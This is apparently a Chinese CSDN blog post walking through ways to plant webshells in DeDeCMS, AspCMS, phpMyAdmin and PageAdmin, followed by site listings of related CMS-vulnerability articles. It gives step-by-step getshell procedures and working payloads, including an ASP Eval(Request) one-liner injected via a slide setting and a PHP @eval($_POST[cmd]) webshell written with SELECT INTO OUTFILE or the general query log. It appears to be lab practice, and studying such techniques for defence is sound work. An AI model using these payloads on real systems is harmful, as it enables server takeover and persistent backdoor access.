常见的cms漏洞

于 2024-08-03 16:07:46 发布
阅读量198 收藏 5
点赞数 6
文章标签: 数据库 服务器 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l_OMl_l/article/details/140892118
版权

DeDeCMS

1.下载打开DeDe

2.上传木马文件

pass 1

打开文件式管理器,上传木马文件

pass 2

打开默认模板管理,在 index.htm 中添加一句话木马

打开更新主页 HTML 将主页位置修改为生成静态,将主页位置改为 ../index.php,更新主页,再次访问站点首页

pass 3

打开广告管理,添加一个广告,并将一句话木马写入

点击代码,复制木马路径

pass 4

打开 SQL 命令执行工具,使用 SQL 语句写入木马文件,切记绝对路径中的 \ 要替换为 /

3.连接

ASPCSM

1.进入网页后台,登录,需要提权,

2.打开幻灯片设置,保存抓包

3. 将slide TextStatus 中的内容换为 asp 一句话木马:1%25><%25Eval(Request (chr(65)))%25><%25 ,密码为a ,影响文件 /config/AspCms_Config.asp

4.访问木马,连接

PhPMyadmin

1.打开 phpmyadmin ,进入 SQL 语句执行模块

2.获取 shell

pass 1 通过日志文件获取

查询日志是否开启

show global variables like '%general%';

查询一句话木马,将其写入日志

pass 2 导出导入获取 shell

向数据库内写入木马文件

select '<?php @eval($_POST[cmd]);?>' into outfile 'E:/tools/PHP_Study_8.1/phpstudy_pro/WWW/1.php'

pass 3 界面图像化获取 shell

打开变量模块,搜索 gen 将第一个修改为 ON,开启日志,第二个修改文件保存位置,其余操作参考 pass 1

3.连接木马

Pageadmin

1.打开环境文件上传,使用哥斯拉生成 asp 木马文件,压缩成压缩包上传,解压

2.连接

LTJOMO
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
帝国cms漏洞分析前台XSS漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 1980
帝国cms漏洞分析前台XSS漏洞 一、帝国cms漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出。 二、帝国cms漏洞复现 1、需要开启会员空间功能(默认关闭),登录后台开启会员空间功能。
CMS漏洞复现
qq_43613144的博客
07-20 6243
漏洞复现-啧啧啧
常见cms漏洞之Pageadmin
最新发布
ineedmoreMuQ的博客
08-03 35
环境iis,sqlserver参考地址项目地址,详情见百度漏洞复现。
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
2401_84263282的博客
05-05 1028
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
CMS漏洞总结
include_voidmain的博客
08-01 4732
CMS漏洞总结
常见cms以及对应cms的历史漏洞
weixin_58155715的博客
11-28 656
OpenCart:OpenCart 是一款免费的电商 CMS,也曾出现过多个漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal:Drupal 是一款强大的 CMS,但也曾经出现过多个漏洞,包括 SQL 注入、跨站脚本、文件包含等。WordPress:这是最流行的 CMS,曾出现过许多漏洞,包括 SQL 注入、XSS、CSRF、权限提升等。Joomla:这款 CMS 曾经出现过一些严重的漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal 7.24 版本中的 SQL 注入漏洞
【文件上传漏洞-08】常见编辑器上传以及常见CMS 上传漏洞
m0_64378913的博客
07-12 2217
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞
2301_76224593的博客
04-26 662
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
74cms v5.0.1漏洞
weixin_56049038的博客
04-13 2752
摘 要 远程连接命令/代码执行漏洞,简称RCE漏洞。RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口...
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
SQL注入是一种常见的Web应用安全漏洞,攻击者可以通过inject恶意的SQL代码来访问或修改敏感数据。在极致CMS中,我们发现了多个SQL注入漏洞,这些漏洞可以让攻击者轻松地访问或修改数据库中的数据。 例如,在FrPHP/...
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
Catfish(鲶鱼)cms-带有越权漏洞的源码.zip
03-16
越权漏洞是网络安全领域中常见的问题,尤其在内容管理系统(CMS)如Catfish(鲶鱼)中更为突出。这类漏洞允许未经授权的用户访问、修改或控制原本只应由特定权限用户操作的数据或功能。在本案例中,“Catfish(鲶鱼...
kMaper.py:CMS 漏洞扫描器 - 基于 Exploit-DB
05-31
《kMaper.py:基于Exploit-DB的CMS漏洞扫描器》 在网络安全领域,漏洞扫描器是必不可少的工具,它们能够帮助我们发现并识别网络系统中的潜在安全风险。kMaper.py是一款专用于CMS(内容管理系统)的漏洞扫描器,它...
简单的 mongoDB 学习
qq_19342829的博客
07-31 485
mongodb入门学习整理
社区养老服务小程序的设计
Karen198的博客
07-31 496
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
MySQL备份与恢复
m0_74860678的博客
08-01 441
在生产环境中,数据的安全性至关重要任何数据的丢失都可能产生严重的后果造成数据丢失的原因程序错误人为操作错误运算错误磁盘故障灾难(如火灾、地震)和盗窃# 开启二进制日志功能[mysqld]# 重启服务# 有 mysql-bin.000001 就代表成功。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 1169
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
时间条件竞争漏洞 cms
12-20
时间条件竞争漏洞是一种常见的网络安全漏洞,通常发生在CMS(内容管理系统)中。这种漏洞利用了程序中的时间相关功能,例如文件的创建或修改时间,来进行攻击。攻击者可以利用这个漏洞来获取未授权的访问权限,或者进行其他恶意操作。 时间条件竞争漏洞的原理是在程序执行的不同时间点进行不同的操作,从而绕过系统的安全检查。例如,攻击者可以在某个请求发送后立即修改文件,然后在系统检查文件时,修改已经生效,导致安全检查失败。 要防范时间条件竞争漏洞,首先需要对CMS系统进行严格的安全审计和测试,确保程序中没有潜在的时间条件竞争漏洞。其次,开发人员需要在代码中加入适当的同步和锁定机制,以防止在不同时间点发生冲突,从而避免漏洞的利用。另外,及时更新CMS系统的补丁,也是防范时间条件竞争漏洞的有效措施。 总的来说,时间条件竞争漏洞是一种常见但危险的安全漏洞,对于CMS系统的开发和管理者来说,需要高度重视并采取相应的安全措施来防范这类漏洞的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值